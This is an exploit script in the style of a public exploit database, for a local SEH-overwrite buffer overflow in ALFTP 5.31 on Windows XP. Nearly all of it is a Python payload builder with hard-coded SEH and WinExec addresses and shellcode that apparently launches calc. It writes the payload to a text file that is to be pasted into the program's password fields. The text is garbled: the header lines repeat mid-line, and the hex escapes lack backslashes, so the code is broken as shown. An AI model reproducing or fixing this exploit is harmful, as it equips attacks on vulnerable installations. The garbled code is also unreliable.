# Exploit Title: ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)
# Exploit Author: Gokul Babu
# Vendor Homepage: http://www.altools.com/downloads/alftp.aspx # Exploit Title: ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)
# Exploit Author: Gokul Babu
# Vendor Homepage: http://www.altools.com/downloads/alftp.aspx
# Vulnerable Software: http://advert.estsoft.com/?event=201001127730323
# Tested on: Windows XP Professional SP3 -Version-2002
# Steps to reproduce-1: (eip overwrite-88-windows-XP)
# Paste the contents of alftp.txt in 'options->Preference->Security->New password &Confirm password'
#seh- 0041A6EF "xEFxA6x41"
#address to jump 0012FA7A
#nseh- "xEBxACx90x90"
#winexec address 0x7c862aed
#!/usr/bin/python
shellcode=("x33xC0"
"x50"
"x68x63x61x6Cx63"
"x8BxC4"
"x50"
"xE8x61x30x73x7C")
buf="x90"*4 + shellcode + "x90"*(80-len(shellcode)) + "xEBxACx90x90" + "xEFxA6x41"
f=open("alftp.txt","w")
f.write(buf)
f.close()